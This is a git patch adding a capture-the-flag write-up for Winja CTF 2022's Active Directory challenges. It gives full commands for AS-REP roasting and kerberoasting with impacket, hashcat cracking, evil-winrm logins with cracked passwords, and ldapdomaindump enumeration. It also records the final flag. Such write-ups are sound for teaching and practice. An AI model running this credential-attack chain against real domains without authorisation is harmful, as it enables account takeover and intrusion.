From 600c12162b0386f477920e4e4005f2b62dfb22d4 Mon Sep 17 00:00:00 2001
From: ARZ <60057481+AbdullahRizwan101@users.noreply.github.com>
Date: Fri, 9 Sep 2022 17:47:43 +0500
Subject: [PATCH] Create AD Category.md
---
Winja CTF 2022/AD Category.md | 119 ++++++++++++++++++++++++++++++++++
1 file changed, 119 insertions(+)
create mode 100644 Winja CTF 2022/AD Category.md
diff --git a/Winja CTF 2022/AD Category.md b/Winja CTF 2022/AD Category.md
new file mode 100644
index 0000000..95d8ce0
--- /dev/null
+++ b/Winja CTF 2022/AD Category.md
@@ -0,0 +1,119 @@
+# Blemflarck
+
+This challenge is related to Active Directory in which we are given these files, `admins.txt` , `hosts` and `nmap.txt`
+
+
+
+admins.txt contains a list of usernames
+
+
+
+nmap.txt contains result of nmap of the domain controller
+
+
+
+and `hosts` contains the IP and domain name of the target
+
+
+
+Now to start solving this, we have a list of usernames of the domain, need to verfiy which users are valid on the domain for that we can use `kerbrute`
+
+
+We can try performing AS-REP roasting using `GetNPUsers` from `impacket` in which the user `shreya` doesn't have pre-authentication set so without providing a valid password for the user we can request for his TGT
+
+```bash
+GetNPUsers.py vindicators.space/ -usersfile ./admins.txt -request
+```
+
+
+
+To crack this we can use `hashcat` with mode `18200
+
+```bash
+hashcat -a 0 -m 18200 ./hash.txt /usr/share/wordlists/rockyou.txt --force
+```
+
+
+
+This will crack the hash with password `$anturce77RioGr@ndePR`
+
+
+Now having the credentials we can login through WinRM which is running on port 5985 using `evil-winrm`
+
+```bash
+evil-winrm -i 34.218.188.252 -u 'shreya' -p ''
+```
+After logging in we can get the flag for this challenge
+
+
+
+## PhoenixPerson
+
+
+
+This challenge is continuation from the first one, we have a valid set of credential, we can try using kerberoasting, if there's a SPN tied to an account we can request for TGS and later crack it
+
+```bash
+GetUserSPNs.py vindicators.space/shreya -request
+```
+
+
+Runing hashcat to crack this hash
+
+
+
+
+
+Now logging with mirage user
+
+```bash
+evil-winrm -i 34.218.188.252 -u 'mirage' -p '!@#New_Life87!@#'
+```
+
+
+
+## DAB-389 b
+
+
+
+This challenge is the last part of AD category where we need to find the third flag through the user `mirage`
+
+From the description the number 389 is referrenced as LDAP which is the port number for that service, we need to enumerate LDAP, there's a tool called `ldapdomaindump`
+
+```bash
+ldapdomaindump -u 'mirage' -p '!@#New_Life87!@#' ldap://34.218.188.252
+```
+
+
+This will generate some html files for users, groups and computers in the domain, going through the `domain_users.html` file we'll get the first part of the flag
+
+
+
+
+
+The second part will be found from `domain_computers.html`
+
+
+
+And the third one from `domain_groups.html`
+
+
+
+We can get the flag through `grep` as well by using regular expression
+
+
+
+Which makes the final flag
+
+```
+flag{3fe05494a09ac38bb5199698b475c48c_LD4P_3num3r4t10n_FTW_:)}
+
+```
+There were good challenges and a lot of categories including web3, cloud and source code review which I haven't done before, due to me doing "real world assesments" I wasn't able to touch the rest of the challenges
+
+
+
+## References
+ - https://hashcat.net/wiki/doku.php?id=example_hashes
+ - https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a
+ - https://www.cyberciti.biz/faq/grep-regular-expressions/